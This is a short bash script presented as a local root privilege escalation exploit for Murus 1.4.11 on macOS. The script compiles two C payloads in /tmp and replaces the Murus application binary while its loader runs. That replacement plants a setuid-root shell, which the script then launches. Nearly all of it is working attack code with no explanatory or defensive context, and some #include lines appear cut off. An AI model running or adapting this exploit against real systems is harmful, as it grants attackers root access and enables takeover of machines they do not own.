#!/bin/bash ################################################################## ###### Murus 1.4.11 local root privilege escalation exploit ###### ###### by m4rkw - https://m4.rkw.io/blog.html ###### ################################################################## echo "compiling payloads..." cat > /tmp/murus411_exp.c < int main() { setuid(0); seteuid(0); execl("/bin/bash","bash","-c","rm -f /tmp/murus411_exp; /bin/bash",NULL); return 0; } EOF gcc -o /tmp/murus411_exp /tmp/murus411_exp.c if [ ! $? -eq 0 ] ; then rm -f /tmp/murus411_exp.c echo "failed to compile, dev tools may not be installed" exit 1 fi rm -f /tmp/murus411_exp.c cat > /tmp/murus411_exp2.c < #include int main() { setuid(0); seteuid(0); system("chown root:wheel /tmp/murus411_exp"); system("chmod 4755 /tmp/murus411_exp"); system("mv /Applications/Murus.app/Contents/MacOS/Murus.orig /Applications/\ Murus.app/Contents/MacOS/Murus"); execl("/Applications/Murus.app/Contents/MacOS/Murus","Murus",NULL); return 0; } EOF gcc -o /tmp/murus411_exp2 /tmp/murus411_exp2.c rm -f /tmp/murus411_exp2.c echo "waiting for loader..." while : do ps auxwww |grep '/Applications/Murus.app/Contents/MacOS/MurusLoader' \ |grep -v grep 1>/dev/null if [ $? -eq 0 ] ; then break fi done echo "planting payload..." mv /Applications/Murus.app/Contents/MacOS/Murus /Applications/Murus.app/\ Contents/MacOS/Murus.orig mv /tmp/murus411_exp2 /Applications/Murus.app/Contents/MacOS/Murus echo "waiting for payload to trigger..." while : do r=`ls -la /tmp/murus411_exp |grep root` if [ "$r" != "" ] ; then break fi sleep 0.1 done echo "kapow" /tmp/murus411_exp